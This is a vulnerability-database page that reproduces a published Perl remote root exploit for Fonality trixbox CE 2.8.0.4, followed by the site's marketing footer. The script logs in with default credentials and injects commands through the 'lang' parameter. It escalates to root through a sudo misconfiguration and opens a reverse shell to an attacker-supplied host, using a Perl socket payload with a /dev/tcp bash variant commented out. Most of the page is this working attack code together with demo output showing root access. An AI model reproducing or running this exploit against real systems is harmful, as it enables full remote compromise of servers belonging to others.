Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Fonality Trixbox CE 2.8.0.4 Command Execution

🗓️ 17 Oct 2014 00:00:00Reported by Simo Ben YoussefType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 29 Views

Fonality trixbox CE remote root exploit allows authenticated user to execute commands as the asterisk user, potentially leading to root privilege escalation

Code
`#!/usr/bin/perl  
#  
# Title: Fonality trixbox CE remote root exploit  
# Author: Simo Ben youssef  
# Contact: Simo_at_Morxploit_com  
# Discovered & Coded: 2 June 2014  
# Published: 17 October 2014  
# MorXploit Research  
# http://www.MorXploit.com  
# Software: trixbox CE  
# Version: trixbox-2.8.0.4.iso  
# Vendor url: http://www.fonality.com/  
# Download: http://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/  
# Vulnerable file: maint/modules/home/index.php  
#  
# Description:  
# maint/modules/home/index.php suffers from a command execution vulnerability, allowing an authenticated user to inject commands as the  
# asterisk user which then can be leverged to root privilege through sudo.  
#  
# from /etc/sudoers:  
## asterisk ALL = NOPASSWD: /bin/bash  
#   
# Vulnerable code:   
# Line 68: $tbLang = $_GET['lang'];  
# Line 339: shell_exec $phpOutput = shell_exec('php -q libs/status.php ' . $tbLang);   
#  
# Note:  
# We did a full audit of Fonality trixbox CE 2.8.0.4 and we found several similar vulnerabilities (File disclosure, command/code execution etc).  
# We didn't think it was necessary to cover all the findings since support for the CE edition has been discontinued  
# but anyone who thinks about installing this should think twice.  
#  
# Download:  
# http://www.morxploit.com/morxploits/morxtrix.pl  
#  
# Demo:  
# perl trixbox.pl http://10.0.0.16 10.0.0.2 1111  
#  
# ===================================================  
# --- Fonality trixbox remote root exploit  
# --- By: Simo Ben youssef <simo_at_morxploit_com>  
# --- MorXploit Research www.MorXploit.com  
# ===================================================  
# [*] MorXploiting http://10.0.0.16/maint/modules/home/index.php  
# [+] Sent payload! Waiting for connect back root shell ...  
# [+] Et voila you are in!  
#  
# Linux trixbox1.localdomain 2.6.18-164.11.1.el5 #1 SMP Wed Jan 20 07:39:04 EST 2010 i686 i686 i386 GNU/Linux  
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)  
#  
# Requires LWP::UserAgent  
# apt-get install libwww-perl  
# yum install libwww-perl  
# perl -MCPAN -e 'install Bundle::LWP'  
# For SSL support:  
# apt-get install liblwp-protocol-https-perl  
# yum install perl-Crypt-SSLeay  
#  
# Author disclaimer:  
# The information contained in this entire document is for educational, demonstration and testing purposes only.  
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.  
  
use LWP::UserAgent;  
use MIME::Base64;  
use IO::Socket;  
use strict;  
  
sub banner {  
system(($^O eq 'MSWin32') ? 'cls' : 'clear');  
print "===================================================\n";  
print "--- Fonality trixbox CE remote root exploit\n";  
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";  
print "--- MorXploit Research www.MorXploit.com\n";  
print "===================================================\n";  
}  
  
if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2])) {  
banner();  
print "perl $0 <target> <connectbackIP> <connectbackport>\n";  
print "perl $0 http://10.0.0.16 10.0.0.2 31337\n";  
exit;  
}  
  
my $host = $ARGV[0];  
my $vuln = "maint/modules/home/index.php";  
my $cbhost = $ARGV[1];  
my $cbport = $ARGV[2];  
my $defuser = "maint"; # Default maint user  
my $defpass = "password"; # Default maint pass  
my $string = "$defuser:$defpass";  
my $encoded = encode_base64($string);  
$| = 1;  
$SIG{CHLD} = 'IGNORE';  
  
my $l_sock = IO::Socket::INET->new(  
Proto => "tcp",  
LocalPort => "$cbport",  
Listen => 1,  
LocalAddr => "0.0.0.0",  
Reuse => 1,  
) or die "[-] Could not listen on $cbport: $!\n";  
  
sub randomagent {  
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',  
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',  
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',  
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',  
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',  
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'  
);  
my $random = $array[rand @array];  
return($random);  
}  
my $useragent = randomagent();  
  
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });  
$ua->timeout(10);  
$ua->agent($useragent);  
my $status = $ua->get("$host/$vuln", Authorization => "Basic $encoded");  
unless ($status->is_success) {  
banner();  
print "[-] Error: " . $status->status_line . "\n";  
exit;  
}  
  
banner();  
print "[*] MorXploiting $host/$vuln\n";  
  
#my $payload = "sudo /bin/bash -i >%26 /dev/tcp/$cbhost/$cbport 0>%261"; # Bash connect back  
my $payload = "sudo /bin/bash -c \"perl -e '\\\$p=fork;exit,if(\\\$p); use Socket; use FileHandle; my \\\$system = \\\"/bin/sh\\\"; my \\\$host = \\\"$cbhost\\\"; my \\\$port = \\\"$cbport\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\"tcp\\\")); connect(SOCKET, sockaddr_in(\\\$port, inet_aton(\\\$host))); SOCKET->autoflush(); open(STDIN, \\\">%26SOCKET\\\"); open(STDOUT,\\\">%26SOCKET\\\"); open(STDERR,\\\">%26SOCKET\\\"); print \\\"[%2b] Et voila you are in!\\\\n\\\\n\\\"; system(\\\"uname -a;id\\\"); system(\\\$system);'\"";  
my $exploit = $ua->get("$host/$vuln?lang=;$payload", Authorization => "Basic $encoded");  
print "[+] Sent payload! Waiting for connect back root shell ...\n";  
  
my $a_sock = $l_sock->accept();  
$l_sock->shutdown(SHUT_RDWR);  
copy_data_bidi($a_sock);  
  
sub copy_data_bidi {  
my ($socket) = @_;  
my $child_pid = fork();  
if (! $child_pid) {  
close(STDIN);  
copy_data_mono($socket, *STDOUT);  
$socket->shutdown(SHUT_RD);  
exit();  
} else {  
close(STDOUT);  
copy_data_mono(*STDIN, $socket);  
$socket->shutdown(SHUT_WR);  
kill("TERM", $child_pid);  
}  
}  
sub copy_data_mono {  
my ($src, $dst) = @_;  
my $buf;  
while (my $read_len = sysread($src, $buf, 4096)) {  
my $write_len = $read_len;  
while ($write_len) {  
my $written_len = syswrite($dst, $buf);  
return unless $written_len;  
$write_len -= $written_len;  
}  
}  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Oct 2014 00:00Current
0.1Low risk
Vulners AI Score0.1
fonality trixbox cecommand executionremote exploitroot privilegesudophp vulnerabilitymorxploit research
29